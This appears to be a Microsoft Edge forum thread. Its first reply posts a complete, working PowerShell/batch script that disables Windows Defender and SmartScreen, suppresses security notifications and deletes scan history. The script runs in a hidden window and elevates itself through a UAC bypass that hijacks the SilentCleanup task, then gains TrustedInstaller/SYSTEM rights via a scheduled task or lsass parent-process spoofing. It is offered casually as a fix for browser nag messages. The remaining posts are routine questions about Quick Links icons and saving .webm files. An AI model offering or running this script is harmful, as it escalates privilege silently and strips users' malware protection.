I also use Kaspersky, maybe for this I have enabled Smart Screen in Edge to stop getting this message, waiting for MS to fix this problem
Since you use another AV, just copy-paste ToggleDefender once into a powershell console and choose Yes when prompted, it will set policies to stop such nagging in Edge: Code: @(echo off% <#%) &color 07 &title Windows Defender Toggle, AveYo 2020-08-27 &rem -fixed tweaks; hidden window set "0=%~f0" &set 1=%*& powershell -nop -win Hidden -c iex ([io.file]::ReadAllText($env:0)) &exit/b ||#>)[1] $PS ={ $Main ={ if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$STATUS='Defender is OFF'}else{$TOGGLE=6;$STATUS='Defender is ON'} ## Uncomment to show a dialog prompt with Yes, No, Cancel (6,7,2) if ($env:1 -ne 6 -and $env:1 -ne 7) { Add-Type -As PresentationFramework;$choice=[System.Windows.MessageBox]::Show('Disable Windows Defender?',$STATUS,3,32); if ($choice -eq 2) {exit} else {$c=[int]$choice; $env:1=$c} } ## Without the dialog prompt above will toggle automatically if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE } ## Comment to not relaunch systray icon try{start SecurityHealthSystray}catch{}; try{start 'C:\Program Files\Windows Defender\MSASCuiL.exe'}catch{} $notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance' ni $notif -ea 0|out-null; sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0} ## 'UAC is not a security boundary' - OK, Microsoft. But why do you refuse to adress the lamest AlwaysNotify-compatible bypass? $ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup') $bypass=$baffling.GetTask('SilentCleanup'); $flaw=$bypass.Definition ## Cascade elevation $r=[char]13; $i=[char]39+$(date)+$r+' (\ /)'+$r+'( * . * ) UAC is useless below Always-Notify'+$r+' ```'+$r+[char]39 $script='-nop -win hidden -c & {mode 50,1;rp hkcu:\environment windir -ea 0;$i='+$i+';$env:1='+$env:1+';$PS={'+$PS+'};& $PS}' $u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3} ## 0: limited-user: must runas if ($u -eq 0) { start powershell -args $script -verb runas -win 1; exit } ## 1: admin-user non-elevated: try lame uac bypass before runas if ($u -eq 1) { if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; exit} sp hkcu:\environment windir $('powershell '+$script+' #') $z=$bypass.RunEx($null,2,0,$null); $wait=0; while($bypass.State -gt 3 -and $wait -lt 7){sleep -m 100; $wait+=0.1} if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0; start powershell -args $script -verb runas -win 1} exit } ## 2: admin-user elevated: get ti/system via schtasks on 1903+ if ($u -eq 2 -and [Environment]::OSVersion.Version.Build -gt 17763) { $act=New-ScheduledTaskAction -Execute powershell -Argument $script $z=Register-ScheduledTask -TaskName '~ti' -Action $act -User 'NT SERVICE\TrustedInstaller' -Force|out-null $f=$ts.GetFolder('\'); $t=$f.GetTask('~ti'); $t.Stop(0); $z=$t.RunEx($null,2,0,$null); $f.DeleteTask('~ti',0); exit } ## 2: admin-user elevated: get ti/system via runasti snippet on older builds [hidden:235406848 show:235406864] elseif ($u -eq 2) { $cmd='powershell '+$script $DM=[AppDomain]::CurrentDomain.DefineDynamicAssembly(1,1).DefineDynamicModule(1);$S=[String];$P=[IntPtr];$I=[UInt32];$J=[Int16] $D=@($DM.DefineType('A',257)); 1..5|%{$D+=$D[0].DefineNestedType('Y'+$_,1179914,[ValueType])}; 4,5|%{$D+=$D[$_].MakeByRefType()} $F=0,($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$S,$S,$S,$I,$I,$I,$I,$I,$I,$I,$I,$J,$J,$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I) 1..5|%{$k=$_;$n=1;$F[$_]|%{$9=$D[$k].DefineField('f'+$n++,$_,6)}}; $M=[System.Runtime.InteropServices.Marshal]; $Z=$P::Zero; $9=$D[0].DefinePInvokeMethod('CreateProcess','kernel32',8214,1,[Int],@($S,$S,$P,$P,[Int],[Int],$P,$S,$D[6],$D[7]),1,4) $T=@();0..5|%{$T+=$D[$_].CreateType();nv ('T'+$_)([Activator]::CreateInstance($T[$_]))}; $T1.f1=131072; $T1.f2=$P::Size; 'TrustedInstaller','lsass'|%{if(!$pn){net1 start $_ >$null 2>&1;$pn=[Diagnostics.Process]::GetProcessesByName($_)[0];}} $v=$M::AllocHGlobal($P::Size); $M::WriteIntPtr($v,$pn.Handle); $T1.f3=$v; $T2.f1=1;$T2.f2=1;$T2.f3=1;$T2.f4=1; $T2.f6=$T1; $T3.f1=$M::SizeOf([Type]$T[4]);$T4.f1=$T3;$T4.f2=$M::AllocHGlobal($M::SizeOf([Type]$T[2]));$M::StructureToPtr($T2,$T4.f2,$false) $9=$T[0].GetMethod('CreateProcess').Invoke($null,@($null,$cmd,$Z,$Z,0,235406848,$Z,$null,($T4 -as $D[4]),($T5 -as $D[5]))); exit } ## Create registry paths $wdp='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' ' Security Center\Notifications','\UX Configuration','\MpEngine','\Spynet','\Real-Time Protection' |% {ni ($wdp+$_)-ea 0|out-null} ## Toggle Defender if ($env:1 -eq 7) { rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0 rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0 rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen -Force -ea 0 rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0 rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0 sc.exe config windefend depend= RpcSs kill -Force -Name MpCmdRun -ea 0 start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-EnableService' -win 1 } else { sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0 sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0 sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen 0 -Type Dword -Force -ea 0 sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0 sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0 net1 stop windefend sc.exe config windefend depend= RpcSs-TOGGLE rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0 # rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0 ## Commented = fake having another av installed kill -Force -Name MpCmdRun -ea 0 start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-DisableService' -win 1 del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\mpenginedb.db') -Force -ea 0 ## Commented = keep scan history del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\History\Service') -Recurse -Force -ea 0 } ## PERSONAL CONFIGURATION TWEAK - UNCOMMENT #rp ENTRIES TO REVERT sp $wdp DisableLocalAdminMerge 1 -Type Dword -Force -ea 0 ## Scriptable Admin Exclusions OFF rp $wdp DisableLocalAdminMerge -Force -ea 0 ## Scriptable Admin Exclusions ON [default] sp $wdp DisableRoutinelyTakingAction 1 -Type Dword -Force -ea 0 ## Auto Actions OFF # rp $wdp DisableRoutinelyTakingAction -Force -ea 0 ## Auto Actions ON [default] sp $wdp PUAProtection 1 -Type Dword -Force -ea 0 ## Potential Unwanted Apps ON # rp $wdp PUAProtection -Force -ea 0 ## Potential Unwanted Apps OFF [default] sp ($wdp+'\MpEngine') MpCloudBlockLevel 2 -Type Dword -Force -ea 0 ## Cloud blocking level HIGH # rp ($wdp+'\MpEngine') MpCloudBlockLevel -Force -ea 0 ## Cloud blocking level LOW [default] sp ($wdp+'\Spynet') SpyNetReporting 2 -Type Dword -Force -ea 0 ## Cloud protection ADVANCED # rp ($wdp+'\Spynet') SpyNetReporting -Force -ea 0 ## Cloud protection BASIC [default] sp ($wdp+'\Spynet') SubmitSamplesConsent 0 -Type Dword -Force -ea 0 ## Sample Submission ALWAYS-PROMPT # rp ($wdp+'\Spynet') SubmitSamplesConsent -Force -ea 0 ## Sample Submission AUTOMATIC [default] sp ($wdp+'\Real-Time Protection') RealtimeScanDirection 1 -Type Dword -Force -ea 0 ## Scan incoming file only # rp ($wdp+'\Real-Time Protection') RealtimeScanDirection -Force -ea 0 ## Scan incoming and outgoing file [default] ## Uncomment to close alwaysnotify-compatible lame uac bypass flaw and reset uac # if ($flaw.Actions.Item(1).Path -ilike '*windir*') { # $flaw.Actions.Item(1).Path=$env:systemroot+'\system32\cleanmgr.exe' ## %windir%\system32\cleanmgr.exe [default] # $baffling.RegisterTaskDefinition($bypass.Name,$flaw,20,$null,$null,$null) ## UAC silent bypass mitigation # $uac='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' # sp $uac EnableLUA 1 -Type Dword -Force -ea 0 ## UAC enable # sp $uac ConsentPromptBehaviorAdmin 2 -Type Dword -Force -ea 0 ## UAC always notify - bypassable otherwise # sp $uac PromptOnSecureDesktop 1 -Type Dword -Force -ea 0 ## UAC secure - prevent automation # } }; & $Main }; & $PS #-_-# hybrid script, can be pasted directly into powershell console
Hi guys. Is it possible somehow restore old Quick Links icons? New icons are too small and looks terrible. Thanks
I'm having an issue recently with Edge, it doesn't let me save .webm video files. Instead, it opens the link with my external video player (mpv). It used to work fine before. Clicking Save As, using the Ctrl+S shorcut or clicking the three dots and selecting Download, all the same. Instead of the traditional Save as file dialog, it opens a dialog saying if I want to open the file, which then launches my external video player, streaming the file from the link.
It's just stable Edge (Version 86.0.622.38 (Official build) (64-bit), I never installed Canary. I was looking through edge://flags but I can't find anything that may be related
Then you must have something wrong with the settings or something missing in the registry. There is no other option.
As I said I haven't touched anything. It all started happening with the latest update from 2 or 3 days ago. I'll just wait for the next update and see what happens, thanks anyways.